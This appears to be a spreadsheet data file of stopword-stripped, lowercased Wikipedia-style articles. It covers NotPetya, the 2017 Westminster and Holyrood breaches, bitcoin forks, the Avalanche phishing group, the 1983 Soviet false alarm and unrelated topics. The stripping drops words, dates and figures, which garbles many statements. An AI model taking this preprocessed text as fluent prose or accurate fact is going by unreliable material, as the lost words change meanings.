launch attack." attack during attack radiation monitoring system ukraine's chernobyl nuclear power plant went offline. several ukrainian ministries, banks, metro systems state-owned enterprises (boryspil international airport, ukrtelecom, ukrposhta, state savings bank ukraine, ukrainian railways) affected. infected computers, important computer files overwritten thus permanently damaged, despite malware's displayed message user indicating files could recovered "safely easily" meeting attackers' demands making requested payment bitcoin currency.the attack seen likely aimed crippling ukrainian state rather monetary reasons. attack came ukrainian public holiday, constitution (celebrating anniversary approval verkhovna rada (ukraine's parliament) constitution ukraine june 1996). most government offices would empty, allowing cyberattack spread without interference. addition, security experts ransomware engage wiping affected hard drives rather encrypting them, would disaster companies affected this.a short time cyberattack began, reported senior intelligence officer head special forces detachment unit ukrainian chief directorate intelligence, colonel maksym shapoval, assassinated kyiv bomb. former government adviser georgia moldova molly mckew believed assassination related cyberattack.on june 2017 ukrainian government stated attack halted, "the situation complete control cyber security specialists, working restore lost data."following initial june attack, security experts found code infected m.e.doc update backdoor could potentially used launch another cyberattack. seeing signs another cyberattack, ukrainian police raided offices medoc july 2017 seized servers. medoc's stated aware backdoor installed servers, refuted involvement attack, working help authorities identify source. security company eset found backdoor installed medoc's updater service early 2017, experts cisco systems' talos group found evidence backdoor early april 2017; either situation points cyberattack "thoroughly well-planned well-executed operation". ukrainian officials stated intellect service "face criminal responsibility", previously warned security servers anti-virus firms prior events take steps prevent talos warned large size medoc update contained notpetya malware (1.5 gigabytes), backdoors find, another attack could possible. attribution june, security service ukraine (sbu) reported seized equipment used launch cyberattack, claiming belonged russian agents responsible launching attack. july 2017 claimed available data showed perpetrators ukraine december 2016 attacked financial system, transport energy facilities ukraine (using telebots blackenergy) hacking groups attacked ukraine june 2017. "this testifies involvement special services russian federation attack," concluded. december 2016 cyber attack ukrainian state energy computer caused power northern part capital, kyiv). russia–ukraine relations frozen state since russia's 2014 annexation crimea followed russian government-backed separatist insurgency eastern ukraine 10,000 people died late june 2017. (russia repeatedly denied sending troops military equipment eastern ukraine). ukraine claims hacking ukrainian state institutions part describe "hybrid war" russia ukraine.on june 2017, cyber security firm eset claimed telebots group (which claimed links blackenergy) behind attack: "prior outbreak, telebots group targeted mainly financial sector. latest outbreak directed businesses ukraine, apparently underestimated malware's spreading capabilities. that's malware went control." eset earlier reported blackenergy targeting ukrainian cyber infrastructure since 2014. december 2016, eset concluded telebots evolved blackenergy hackers telebots using cyberattacks sabotage ukrainian financial sector second half 2016.around time july raid medoc, $10,000 bitcoin already collected listed wallets notpetya collected, experts believed used space anonymous network. message posted purportedly notpetya authors demanded 100,000 bitcoin (about $2.6 million) halt attack decrypt affected files. july 2017, second message purportedly notpetya authors posted website, demanding wish decrypt files send bitcoin (approximately $250,000). message signed private used original petya ransomware, suggesting group responsible both.according reports cited january 2018 united states central intelligence agency claimed russia behind cyberattack, russia's main intelligence directorate (gru) designed notpetya. similarly, united kingdom ministry defence accused russia february 2018 launching cyberattack, attacking systems ukraine, cyberattack would spread affect major systems united kingdom elsewhere. russia denied involvement, pointing russian systems also impacted attack.wired technology writer andy greenberg, reviewing history cyberattacks, said attacks came russian military hacker group called "sandworm". greenberg asserted sandworm behind 2016 blackouts kyiv, among events. group focusing hacking ukraine's financial sector, sometime early 2017, able gain access m.e. doc's update servers, could used maliciously send cyberattack june 2017. affected companies companies affected include antonov, kyivstar, vodafone ukraine, lifecell, channels stb, ictv atr, kyiv metro, ukrgasvydobuvannya (ugv), stations wog, dtek, epicentre kyiv international airport (zhuliany), prominvestbank, ukrsotsbank, kredobank, oshchadbank others, 1,500 legal entities individuals contacted national police ukraine indicate victimized june 2017 cyberattack. oshchadbank fully functional july 2017. ukraine's electricity company's computers also went offline attack; company continued fully operate without using computers.while affected companies ukraine, ransomware also spread several companies geolocations, businesses offices ukraine networking around globe. non-ukrainian companies reporting incidents related attack include food processor mondelez international, terminals subsidiary international shipping company a.p. moller-maersk, fedex shipping subsidiary express august 2017 deliveries still disrupted attack), chinese shipping company cofco group, french construction materials company saint gobain, advertising agency plc, heritage valley health system pittsburgh, firm piper, pharmaceutical company merck co., consumer goods maker reckitt benckiser, software provider nuance communications. ukrainian police officer believes ransomware attack designed global distract directed cyberattack ukraine.the cost cyberattack determined, week initial attack, companies still working mitigate damage. reckitt benckiser lowered sales estimates (about $130 million) second quarter primarily attack affected global supply chain. bossert, homeland security adviser president united states, stated total damage us$10 billion. among estimated damages specific companies included us$870 million merck, us$400 million fedex, us$384 million saint-gobain, us$300 million maersk. reaction secretary national security defence council ukraine oleksandr turchynov claimed signs russian involvement june cyberattack, although give direct evidence. russian officials denied involvement, calling ukraine's claims "unfounded blanket accusations". nato secretary-general jens stoltenberg vowed june 2017 nato would continue support ukraine strengthen cyber defence. white house press secretary released statement february 2018 attributing attack russian military, calling "the destructive costly cyberattack history." also december 2015 ukraine power grid cyberattack russian–ukrainian cyberwarfare references external links greenberg, andy june 2017). "how entire nation became russia's test cyberwar". wired.</t>
  </si>
  <si>
    <t>2017 Westminster data breach</t>
  </si>
  <si>
    <t>2017 westminster data breach occurred june 2017, unauthorised attempt made gain access email accounts belonging number politicians united kingdom's houses parliament. whitehall officials claimed iran behind attack. incident followed attempt hack accounts belonging politicians scottish parliament august 2017. events parliamentarians told cyberattack evening june, made public knowledge following chris rennard, liberal democrat member house lords posted request social media asking people needing contact urgently text message. remote access politicians email accounts disabled. however, spokesperson house commons said precautionary measure protect security rather consequence cyberattack itself. matter investigated national cyber security centre assistance national crime agency.westminster authorities described attack "sustained determined", follows media reports email passwords government ministers obtained hackers sold online.on june, westminster spokesperson confirmed cyberattack attempt hack email accounts weak passwords, investigation found less 9,000 email addresses associated parliament compromised—a figure representing around email accounts. however, still treated serious security breach: "the figure less many feared, still breach." subsequently said agencies links either russia north korea suspected behind attack. holyrood cyberattack august, officials holyrood, home scottish parliament warned accounts belonging members scottish parliament (msps) currently subject brute-force attack attempting crack weak passwords, accounts compromised. however, msps warned find temporarily locked accounts security reasons. news outlets, guardian reported attack similar nature occurred westminster. following officials said holyrood working uk's national cyber security centre increase security measures. references</t>
  </si>
  <si>
    <t>List of bitcoin forks</t>
  </si>
  <si>
    <t>bitcoin forks defined variantly changes protocol bitcoin network situations occur "when blocks block height". fork influences validity rules. forks typically conducted order features blockchain, reverse effects hacking catastrophic bugs. forks require consensus resolved else permanent split emerges. forks client software following forks software client bitcoin network: bitcoin fork initiated mike hearn. current reference implementation bitcoin contains computational bottleneck. actual fork preceded mike hearn publishing bitcoin improvement proposal (bip june 2014, calling addition small protocol extension performs utxo lookups given outpoints." december 2014 hearn released version 0.10 forked client changes. achieved significant attention within bitcoin community mid-2015 amid contentious debate among core developers increasing block size cap.on june 2015, gavin andresen published calling increase maximum block size. changes would activate fork allowing eight blocks (doubling size every years) stretch 1,000 mined blocks achieved beginning 2016. maximum transaction rate would transactions second.on august 2015 andresen's bip101 proposal merged codebase. reverted 2-mb block size bump bitcoin classic applied instead.the august 2015 release received widespread media coverage. guardian wrote "bitcoin facing civil war".wired wrote "bitcoin exposes extremely social—extremely democratic—underpinnings open source idea, approach makes open source much powerful technology controlled person organization." developer adam back critical activation threshold changes insecure.on august 2017, bitcoin published release bitcoin cash client default. subsequently, release published, supported november 2017 bitcoin cash protocol upgrade, followed release supported 2018 bitcoin cash protocol upgrade.bitcoin classic first months, bitcoin classic promoted single increase maximum block size megabyte megabytes. november 2016 changed project moved solution moved limit software rules hands miners nodes. bitcoin unlimitedall three software clients attempt increase transaction capacity network. none achieved majority hash power. intended hard forks splitting cryptocurrency hard forks splitting bitcoin (aka "split coins") created changes blockchain rules sharing transaction history bitcoin certain time date. first hard fork splitting bitcoin happened august 2017, resulting creation bitcoin cash. following list notable hard forks splitting bitcoin date and/or block: bitcoin cash: forked block 478558, august 2017, bitcoin (btc), owner bitcoin cash (bch) bitcoin forked block 556766, november 2018, bitcoin cash (bch), owner bitcoin (bsv). ecash: forked block 661648, november 2020, bitcoin cash (bch), owner 1,000,000 ecash (xec). bitcoin gold: forked block 491407, october 2017, bitcoin (btc), owner bitcoin gold (btg) intended soft forks splitting not-most-work block fork fixing value overflow incident controversial announced exploit mined. assigned cve-2010-5139. intended soft forks splitting most-work block segwit taproot taproot agreed soft fork transaction format. fork adds support schnorr signatures, improves functionality smart contracts lightning network. fork installed november 2021. upgrade adds privacy features. taproot includes bitcoin improvement proposal numbers bip340, bip341, bip342.advantages: complex transactions, requiring multiple signatures delayed release, indistinguishable simple transactions terms on-chain data. reduced transaction costs: data size complex bitcoin transactions reduced, leads lower transaction fees. support complicated conditions transaction schnorr signatures. benefits lightning network: more flexibility, privacy enhancement, lower costs. unintended hard forks hard forks created "protocol change" definition: march 2013 chain fork (migration berkeleydb leveldb caused chain split) cve-2018-17144 (bitcoin 0.15 allowed double spending certain inputs block. exploited) references source code other references</t>
  </si>
  <si>
    <t>List of community currencies in Canada</t>
  </si>
  <si>
    <t>these community currencies (also known "local currencies") canada. billet local d'échange (blé; 2018—present; québec city) chinook hour (1996—2002; replaced calgarydollars.ca present) brampton dollars (1973) calgary dollars (1996, 2002—present) chouenne (2021—present; charlevoix, québec) cochrane dollar community dollar (2009—present) demi (2015—present; gaspésie, québec) dollar solidaire (2020—present; québec city) dollar johannois (2004—present; saint-jean-de-dieu, québec) holey dollar (19th century; prince edward island) kawartha loon (2012–present) lets local exchange trading systems community dollar (c.2004—present) paco dollar (2004—2017; saint-pacôme, québec) pioneer petroleum "bonus bucks" prosperity certificate (1936; alberta) salt spring dollar (2001—present) saskbucks (19??, saskatchewan) tamworth hours toronto dollar (1998—2013) unity dollar (2006–present)l'îlot montreal's island also list community currencies united states list community currencies united kingdom references external links "community currency magazine". "other local currencies". salt spring island monetary foundation. archived original 2008-12-27. retrieved 2011-04-04.</t>
  </si>
  <si>
    <t>Privacy Badger</t>
  </si>
  <si>
    <t>privacy badger free open-source browser extension google chrome, mozilla firefox, opera, firefox android created electronic frontier foundation (eff). purpose promote balanced approach internet privacy consumers content providers blocking advertisements tracking cookies respect track setting user's browser. second purpose, served free distribution, encourage membership donation eff. description states: advertiser seems tracking across multiple websites without permission, privacy badger automatically blocks advertiser loading content browser. advertiser, like suddenly disappeared." privacy badger works detecting presence content loaded third-party domains visit website, blocking domains determined tracking you.: controls software allow selective blocking third-party domains based user preference.: while code based adblock plus, privacy badger blocks come embedded trackers.privacy badger noted recommended tool tools protect online privacy.in october 2020, following security disclosures google security team, privacy badger changed default behavior. while would previously learn block trackers heuristically installed, defaults blocking trackers already knows automated testing release. while still configured learn heuristically, longer default option exploited third-parties fingerprint user based trackers blocks. history alpha version released 2014, followed beta july 2014. april 2017, announced privacy badger surpassed million users. reception several publications reported privacy badger 2014, following alpha release. paul, world, mentions privacy badger "only blocks third-party tracking, first party", mentions prevention browser fingerprinting planned future release.ars technica notes advertiser makes commitment respect track requests, cookies unblocked privacy badger.nathan willis, writing lwn.net, describes green, yellow, sliders privacy badger menu "nice visualization aid", making easy user toggle trackers off, desired describing much easier browse blocking add-on interfaces.kif leswing writing gigaom writes, "privacy badger’s blacklist generated heuristic blocking, means gets better longer used", wrote 2014 privacy badger "breaks websites", considers important created nonprofit organization, sums "more good enough". competitors privacy badger belongs class free tracker blockers function browser plugins.: competitors privacy badger include disconnect, ublock origin, redmorph ghostery.: privacy badger also compared favorably blur, annual subscription fee. also donottrackme open-source application designed stop non-consensual third party trackers. https everywhere free open-source browser extension developed project automatically makes websites secure https connection. switzerland open-source network monitoring utility developed monitor network traffic. references external links official website</t>
  </si>
  <si>
    <t>Pioneer Energy</t>
  </si>
  <si>
    <t>pioneer energy (formerly pioneer petroleums), commonly referred pioneer, retailer convenience store operator, locations ontario, canada. founded murray hogarth 1956, headquartered burlington, ontario. subsidiary parkland fuel corporation. history murray hogarth graduated queen's university worked gulf canada limited learning petroleum business. after three years hogarth quit founded private brand service station business 1956. first pioneer petroleums stations opened november 1956 located upper james hamilton, ontario.in 2011, pioneer petroleums changed brand name pioneer energy modernized operations number different services. snack express pioneer's main convenience store brand offers standard convenience store items along healthier snack options. 2012, pioneer expanded convenience store brands include verve, concept store handles refined product offering. many newer stations offer clean express washes variety different washes. 2013, pioneer fuels established esso branded commercial home heating reseller nova scotia brunswick. services approximately 21,000 households since expanding across atlantic canada.in 2014 parkland fuel corp, agreed pioneer energy (part-owned suncor energy) $378 million. stations (148 pioneer brand name) ontario manitoba part initial deal. this merger challenged competition bureau 2015 modified acquisition accepted 2016. loyalty pioneer offered full-service pledge, promising wash customer's windshields check hoods every fuel purchase litres more. failure resulted customers receiving free fill-up.its customer rewards/loyalty program began collector stamps late 1950s. this followed introduction pioneer money 1960s. 1980s, program evolved introduction pioneer paper bonus bucks. mid-2000s pioneer began electronic bonus bucks card program. bonus bucks cardholders also benefit exclusive discounts pioneer partner companies organizations. pioneer transitioned journie rewards, scales parkland branded locations. philanthropy pioneer contributed many ontario based charities. “give what can” campaign donated million ontario's five designated children's hospitals continues part efforts, mcmaster children's hospital able build “hogarth family pioneer energy ophthalmology centre”. 2012, pioneer also involved operation yellow ribbon, initiative across canada support canadian soldiers families. pioneer became donation partner chml/y108 christmas tree hope. donations chml/y108 children's fund, helps support mcmaster children's hospital, salvation army, hamilton children's aid. pioneer also partnered ontario federation anglers hunters work atlantic salmon restoration project. references external links official website</t>
  </si>
  <si>
    <t>Avalanche (blockchain platform)</t>
  </si>
  <si>
    <t>avalanche decentralized, open-source proof stake blockchain smart contract functionality. avax native cryptocurrency platform. history avalanche started protocol solving consensus network unreliable machines, failures crash-fault byzantine. protocol's fundamentals first shared interplanetary file system (aka ipfs) 2018 pseudonymous group enthusiasts going name "team rocket”. later developed dedicated team researchers cornell university. research emin sirer, professor computer science software engineer, assisted doctoral students maofan "ted" kevin sekniqi. following research stage, startup technology company founded develop blockchain network would meet complex finance industry requirements. number sources indicate, "the project realm academic circles interested exploring consensus protocols serve purpose proof-of-work securing transactions energy-efficient potential provide basis democratic development inclusion users consensus process". march, 2020, codebase (developer accelerator program dap) avalanche consensus protocol became open-source available public.in september, 2020, company also issued native token avax acronym "avalanche"). design chains avalanche different chain types: x-chain, exchange chain, platform creation trading digital assets. c-chain, contract chain, chain used smart contracts p-chain, platform chain, chain staking validating avax. stakers validators avalanche receive avax rewards chain. avax avalanche (avax) native token avalanche, traded x-chain. protocol protocol four basic interrelated mechanisms compose structural support consensus tool. these four mechanisms slush, snowflake, snowball, avalanche. using randomized sampling metastability ascertain persist transactions, represents protocol family. although original paper focused single protocol, namely avalanche, implicitly introduced broad spectrum voting-based, quorum-based consensus protocols, called snow family. while avalanche single instantiation, snow family seems able generalize quorum-based voting protocols replica control. unlike prior quorum-based work, snow family enables arbitrarily parametrizable failure probability quorum intersection level. standard quorum-based protocols define failure probability precisely zero, introducing errors quorum intersection, larger consensus protocol design available. background consensus protocols basis state machine replication problem, aims enable machines achieve agreement network even subset machines corrupted. there major families consensus protocols date classical consensus nakamoto consensus protocols. first achieves consensus quorums, thus requires voting. famous instantiations paxos crash-fault-tolerant environment) pbft byzantine-fault tolerant case. these protocols achieve agreement similar operation parliament: proposal (transaction) proposed voted accepted rejected. sufficient votes cast various replicas accumulated (typically collected elected leader replica), quorum achieved, thus agreement. second family, pioneered satoshi nakamoto bitcoin nakamoto consensus. unlike quorum-based protocols, machines operating instance nakamoto consensus achieve agreement transactions downloading longest chain (typically called fork). bitcoin, longest chain verified ensuring highest degree work proof work). snow, quorum-based, seems universal generalization quorum-based protocols. unlike prior work requires quorums deterministic, i.e. failure probability precisely zero, avalanche loosens requirement, thus enabling quorum-based protocols estimate global network state errors. assumptions while snow family theoretically generalized classes assumptions quorum-based protocols previously made, formalization paper analyzes avalanche asynchronous network byzantine setting. assumptions follows: processors processors operate arbitrary speed. processors experience arbitrary failures, even byzantine ones. processors stable storage re-join protocol failures. processors collude, lie, otherwise attempt subvert protocol. (that byzantine failures permissible.)network processors send messages processor. messages sent asynchronously take arbitrarily long deliver. messages lost, reordered, duplicated. messages delivered without corruption, i.e. adversary cannot forge digital signatures. safety liveness properties snow family generalizes typical definitions safety liveness encountered quorum-based protocols. avalanche specifically, properties are: agreement consistency, safety) node machine) finalizes value *v*, node finalize another value conflicts probability higher $\epsilon$. termination liveness) network resumes synchronous operation, nodes achieve agreement.avalanche, like asynchronous networks, guaranteed terminate thus liveness property, asynchrony. like paxos, avalanche's goal ensure fault tolerance guarantees safety asynchrony, liveness. this contrast nakamoto consensus, guarantees liveness, safety asynchrony. also fault-tolerant computer system replication (computing) paxos virtual synchrony raft chandra–toueg consensus algorithm references</t>
  </si>
  <si>
    <t>Avalanche (phishing group)</t>
  </si>
  <si>
    <t>avalanche criminal syndicate involved phishing attacks, online bank fraud, ransomware. name also refers network owned, rented, compromised systems used carry activity. avalanche infected computers running microsoft windows operating system. november 2016, avalanche botnet destroyed four-year project international consortium enforcement, commercial, academic, private organizations. history avalanche discovered december 2008, replacement phishing group known rock phish stopped operating 2008. eastern europe given name security researchers high volume attacks. avalanche launched phishing attacks first half 2009; second half 2009, anti-phishing working group (apwg) recorded 84,250 attacks avalanche, constituting phishing attacks. number total phishing attacks doubled, increase apwg directly attributes avalanche.avalanche used spam email purporting come trusted organisations financial institutions employment websites. victims deceived entering personal information websites made appear though belong organisations. they sometimes tricked installing software attached emails website. malware logged keystrokes, stole passwords credit card information, allowed unauthorised remote access infected computer. internet identity's phishing trends report second quarter 2009 said avalanche "have detailed knowledge commercial banking platforms, particularly treasury management systems automated clearing house (ach) system. they also performing successful real-time man-in-the-middle attacks defeat two-factor security tokens."avalanche many similarities previous group rock phish first phishing group used automated techniques greater scale volume. avalanche hosted domains compromised computers botnet). there single hosting provider, making difficult take domain requiring involvement responsible domain registrar. addition, avalanche used fast-flux dns, causing compromised machines change constantly. avalanche attacks also spread zeus trojan horse enabling criminal activity. majority domains avalanche used belonged national domain name registrars europe asia. this differs phishing attacks, majority domains u.s. registrars. appears avalanche chose registrars based security procedures, returning repeatedly registrars detect domains used fraud, slow suspend abusive domains.avalanche frequently registered domains multiple registrars, testing others check whether distinctive domains detected blocked. they targeted small number financial institutions time, rotated regularly. domain suspended registrar re-used later attacks. group created phishing "kit", came pre-prepared many victim institutions.avalanche attracted significant attention security organisations; result, uptime domain names used half phishing domains.in october 2009, icann, organisation manages assignment domain names, issued situation awareness note encouraging registrars proactive dealing avalanche attacks. registry, nominet changed procedures make easier suspend domains, attacks avalanche. interdomain, spanish registrar, began requiring confirmation code delivered mobile phone april 2009 successfully forced avalanche stop registering fraudulent domains them.in 2010, apwg reported avalanche responsible two-thirds phishing attacks second half 2009, describing "one sophisticated damaging internet" "the world's prolific phishing gang". takedown november 2009, security companies managed shut avalanche botnet short time; avalanche reduced scale activities altered modus operandi. april 2010, attacks avalanche decreased high 26,000 october 2009, decrease temporary.on november 2016, avalanche botnet destroyed four-year project interpol, europol, shadowserver foundation, eurojust, luneberg (germany) police, german federal office information security (bsi), fraunhofer fkie, several antivirus companies organized symantec, icann, cert, fbi, domain registries used group. symantec reverse-engineered client malware consortium analyzed data captured years. this allowed defeat fast-flux distributed obfuscation, command/control structure botnet, identify numerous physical servers. premises searched, servers seized, rented servers removed network unwitting owners notified, 500,000 zombie computers freed remote control, families malware deprived c/c, five people botnet arrested. enforcement sinkhole server, described 2016 "largest ever", 800,000 domains served, collects addresses infected computers request instructions botnet isps owning inform users machines infected provide removal software. malware deprived infrastructure following malware families hosted avalanche: windows-encryption trojan horse (wvt) (a.k.a. matsnu, injector, rannoh, ransomlock.p) urlzone (a.k.a. bebloh) citadel vm-zeus (a.k.a. kins) bugat (a.k.a. feodo, geodo, cridex, dridex, emotet) newgoz (a.k.a. gameoverzeus) tinba (a.k.a. tinybanker) nymaim/goznym vawtrak (a.k.a. neverquest) marcher pandabanker ranbyus smart teslacrypt trusteer xswkitthe avalanche network also provided communications botnets: teslacrypt nymaim corebot gettiny matsnu rovnix urlzone qakbot (a.k.a. qbot, pinkslip bot) references external links joint cyber operation takes down avalanche criminal network (fbi)</t>
  </si>
  <si>
    <t>2017 Holyrood cyberattack</t>
  </si>
  <si>
    <t>messag, user, inform, network, state, spam, secur, servic, certif, oper</t>
  </si>
  <si>
    <t>Acme Commodity and Phrase Code</t>
  </si>
  <si>
    <t>acme commodity phrase code codebook providing general-purpose commercial telegraph code known acme code. published 1923 acme code company. book provides listing condensed terms codes used shorten telegrams save money. book extremely popular amongst businesses 1930s. this code telegram codes permitted allied powers second world war. description acme code consists hundred thousand five letter codes intended stand phrase. designed tolerant transposition errors; author claims transposition adjoining letters make another word book". however, later discovered reeds, code provide level error correction, containing least eleven pairs words differing transposition letters. despite errors, code precursor modern error correction codes. references</t>
  </si>
  <si>
    <t>1983 Soviet nuclear false alarm incident</t>
  </si>
  <si>
    <t>september 1983, cold war, nuclear early-warning radar soviet union reported launch intercontinental ballistic missile four missiles behind bases united states. these missile attack warnings suspected false alarms stanislav petrov, officer soviet defence forces duty command center early-warning system. decided wait corroborating evidence—of none arrived—rather immediately relaying warning chain-of-command. this decision seen prevented retaliatory nuclear attack united states nato allies, would likely resulted escalation full-scale nuclear war. investigation satellite warning system later determined system indeed malfunctioned. background incident occurred time severely strained relations united states soviet union. responding soviet union's deployment fourteen ss-20/rsd-10 theatre nuclear missiles, nato double-track decision taken december 1979 military commander nato deploy pershing nuclear missiles western europe ability targets eastern ukraine, byelorussia lithuania within minutes longer range, slower bgm-109g ground launched cruise missile (glcm) strike potential targets farther east. mid-february 1981, continuing 1983, psychological operations united states began. these designed test soviet radar vulnerability demonstrate nuclear capabilities. they included clandestine naval operations barents, norwegian, black, baltic seas near giuk gap, well flights american bombers, occasionally several times week, directly toward soviet airspace turned away last moment. really them," recalls william schneider jr., [former] undersecretary state military assistance technology, classified "after-action reports" indicated u.s. flight activity. "they know meant. squadron would straight soviet airspace, radars would light units would alert. then last minute squadron would peel return home." from accounts senior officers, 1981, obsessed historical parallels 1941 reaganite rhetoric, defensive capability pershing iis, soviet leaders believed united states preparing secret nuclear attack ussr initiated operation ryan. under this, agents abroad monitored service technical personnel would implement nuclear attack able either preempt mutually assured destruction. september 1983, soviet military shot south korean passenger jet, korean lines flight 007, strayed soviet airspace. people aboard aircraft killed, including u.s. congressman larry mcdonald many americans. first pershing missiles reportedly deployed late november 1983.bruce blair, expert cold nuclear strategies former president world security institute washington, d.c., says american–soviet relationship time: "... deteriorated point soviet union system—not kremlin, soviet leader yuri andropov, kgb, system—was geared expect attack retaliate quickly hair-trigger alert. nervous prone mistakes accidents. false alarm happened petrov's watch could come dangerous, intense phase u.s.–soviet relations." interview aired american television, blair said, "the russians (soviets) u.s. government preparing first strike, headed president ronald reagan capable ordering first strike." regarding incident involving petrov, said, think closest country come accidental nuclear war." incident september 1983, stanislav petrov, lieutenant colonel soviet defense forces, officer duty serpukhov-15 bunker near moscow housed command center soviet early warning satellites, code-named oko. petrov's responsibilities included observing satellite early-warning network notifying superiors impending nuclear missile attack soviet union. notification received early-warning systems inbound missiles detected, soviet union's strategy immediate compulsory nuclear counter-attack united states (launch warning), specified doctrine mutual assured destruction.shortly midnight, bunker's computers reported intercontinental ballistic missile heading toward soviet union united states. petrov considered detection computer error, since first-strike nuclear attack united states likely involve hundreds simultaneous missile launches order disable soviet means counterattack. furthermore, satellite system's reliability questioned past. petrov dismissed warning false alarm, though accounts event differ whether notified superiors concluded computer detections false missile launched. petrov's suspicion warning system malfunctioning confirmed missile fact arrived. later, computers identified four additional missiles air, directed towards soviet union. petrov suspected computer system malfunctioning again, despite direct means confirm this. soviet union's land radar incapable detecting missiles beyond horizon.it subsequently determined false alarms caused rare alignment sunlight high-altitude clouds satellites' molniya orbits, error later corrected cross-referencing geostationary satellite.in explaining factors leading decision, petrov cited belief training u.s. first strike would massive, five missiles seemed illogical start. addition, launch detection system view wholly trustworthy, ground radar failed pick corroborative evidence even several minutes false alarm. aftermath petrov underwent intense questioning superiors actions. initially, praised decision. general yuri votintsev, commander soviet defense's missile defense units, first hear petrov's report incident (and first reveal public 1998), stated petrov's "correct actions" "duly noted." petrov stated initially praised votintsev promised reward, recalled also reprimanded improper filing paperwork pretext described incident military diary.he received reward. according petrov, incident bugs found missile detection system embarrassed superiors influential scientists responsible officially rewarded, would punished. reassigned less sensitive post, took early retirement (although emphasized "forced out" army, sometimes claimed western sources), suffered nervous breakdown.oleg kalugin, former chief foreign counter-intelligence knew soviet leader yuri andropov well, said andropov's distrust american leaders profound. conceivable petrov declared satellite warnings valid, erroneous report could provoked soviet leadership becoming bellicose. kalugin said: "the danger soviet leadership thinking, 'the americans attack, better attack first.'" also dead hand nuclear weapons-control system used automatically launch russian intercontinental ballistic missiles nuclear strike detected, even commanding elements fully destroyed able archer nato military exercise happened month petrov incident deutschland list nuclear close calls 2018 hawaii false missile alert incident false ballistic missile alert issued civilians state hawaii norwegian rocket incident rocket carrying scientific equipment study aurora borealis resembled submarine-launched trident missile vasily arkhipov subject another nuclear war-averting incident cuban missile crisis wargames 1983 film released four months prior incident, depicting early warning system's false alarm thermonuclear strike world situations resulting close encounters third world 1961 goldsboro b-52 crash another nuclear accident narrowly missed widespread destruction references external links brightstarsound.com stanislav petrov tribute website, multiple pages photos reprints various articles petrov nuclear war: minuteman article weekendavisen, april 2004. nuclear almost happened 1983 (posted september 2003). history news network, originally baltimore august 2003 armageddon almost averted "sept. 1983: saved world doing nothing". years computer glitch nearly caused world iii. register. september 2013</t>
  </si>
  <si>
    <t>U.S. Agency for Global Media</t>
  </si>
  <si>
    <t>united states agency global media (usagm), formerly broadcasting board governors (bbg), independent agency united states government broadcasts news information. describes mission, "vital national interests", "inform, engage, connect people around world support freedom democracy". considered diplomacy.the usagm supervises voice america (voa) office cuba broadcasting well state-funded radio free europe/radio liberty, radio free asia, middle east broadcasting networks open technology fund. board usagm advisory role. previously supervised usagm media networks directly, replaced single appointed chief executive officer (ceo) part national defense authorization fiscal year 2017, passed december 2016. history formed 1994 passing international broadcasting act. established bipartisan board consisted nine voting members, eight appointed president three–year term. ninth secretary state, also political appointee, would serve officio board member duration term secretary. point, considered part u.s. information agency. first voting members bbg, confirmed august 1995, david burke, kaufman, korologos, bette lord, alberto mora, cheryl halpern, marc nathanson, carl spielvogel.on october 1999, established independent agency foreign affairs reform restructuring act. despite change, required would remain supervision inspector general state department foreign service.in 2002, launched radio sawa, 24/7 arabic language radio network broadcasts news western arabic music middle east.in 2004, alhurra created televised sister network radio sawa began broadcasting throughout middle east. since founding, established programs youm (today english), daily three-hour news program broadcast five countries three different continents; musawat (equality english), program focuses women's issues rights arab world.in 2005, middle east broadcasting network, (mbn) initiated oversee arabic broadcasts. under mbn, arabic broadcasting expanded, including 2009 establishment program youm, expanding programming egypt, covering iraq war, first egyptian democratic elections, arab viewpoints u.s. elections, more.other networks also expanded bbg. voice america worked radio free europe/radio liberty launch radio farda, persian-language radio program targeting youth. 2006, initiated ashna, one-hour televised news broadcast, radio deewa, daily radio program sports, music, local international news.in january 2015 interview york times, newly appointed bbg, andrew lack, said facing number challenges entities like russia today pushing point view, islamic state middle east groups like boko haram." state department spokeswoman psaki clarified lack's statement january press briefing, saying "would u.s. government three category? wouldn’t. however, concerns...that russia’s independent media space shrinking kremlin continues apply pressure remaining outlets."in 2018, changed name u.s. agency global media (usagm).on january 2021, taiwanese journalist kelu chao appointed acting usagm, replacing outgoing michael pack. organization usagm single chief executive officer appointed president united states confirmed u.s. senate. until 2016, headed bi-partisan board nine members; eight appointed president senate confirmation, ninth member officio secretary state. law, four members could political party, effort limit partisanship. president designated member (other secretary state) serve chairman. board served "firewall" political interference journalistic product.but, upon enactment national defense authorization fiscal year 2017 december 2016 agency placed direction single ceo. board, officially renamed international broadcasting advisory board, reduced five members appointed president serve advisory role. (previously appointed board members excess five could continue serve, would replaced term expired.) under 2016 reform legislation, agency nominated u.s. president confirmed u.s. senate authority select agency personnel. former usagm john lansing, selected approved 2015 board holding democratic majority obama administration, nominated president obama confirmed republican-controlled u.s. senate, required previous legislation. june 2018, president trump announced intention nominate documentary film producer michael pack head agency. confirmed senate years later, served june 2020 january 2021, asked resign request newly-inaugurated president biden. past members board included: october 2021, u.s. government accountability office (gao) published report usagm’s organization. outlets funding solicited annual funding congress proposed budget summary, found website. board submitted annual budget submission specific initiatives. initiatives 2011 included improving global satellite distribution capacity, creating radio free asia video programming improving distribution voice america content.announced april 2011, received million congress purpose fighting internet censorship. during federal funding dispute fiscal year 2011, president barack obama sided agreeing language organization would "expand unrestricted access information internet." this work includes anti-censorship campaigns china countries.their operating budget fiscal year 2016 us$752 million.the agency million earmarked 2019–20 hong kong protests open technology fund. this funding frozen june 2020 china preparing introduce national security hong kong. reception february 2010, executive director jeff trimble collaborated national security council publish statement iran's jamming international satellites. email foreign policy magazine, bbg's public affairs director responded controversy, stating "the 'firewall' served protect integrity credibility journalistic products. official policy statement senior management official agency journalistic product."later year, senator coburn held obama administration's appointments michael meehan dana perino board, drawing attention organization's perceived ineffectiveness, stating interview foreign policy magazine: "the worthless organization federal government. it's full people know nothing media foreign policy." senator demint also attempted nominations force hearing frustrations perceived lack congressional oversight organization. coburn written open letter then–senate minority leader mitch mcconnell august 2010 citing "longstanding concerns regarding transparency effectiveness taxpayer funded international broadcasting agencies purview broadcasting board governors." though report eventually given senate committee foreign relations, coburn ultimately unsuccessful trying block appointments board.in july 2016, chairman broadcasting board governors, jeff shell, denied entry russia. matt novak, writing tech website gizmodo, referred "propaganda arm" u.s. government speculated alleged role spreading propaganda behalf u.s. government reason shell denied entry russia.in 2018, york times reported agency targeted americans facebook outlets, would violate smith–mundt act, protect americans domestic propaganda". also title code federal regulations references external links official website agency global media federal register broadcasting board governors federal register u.s. agency global media usaspending.gov government accountability office, u.s. agency global media: additional actions needed improve oversight broadcasting networks".</t>
  </si>
  <si>
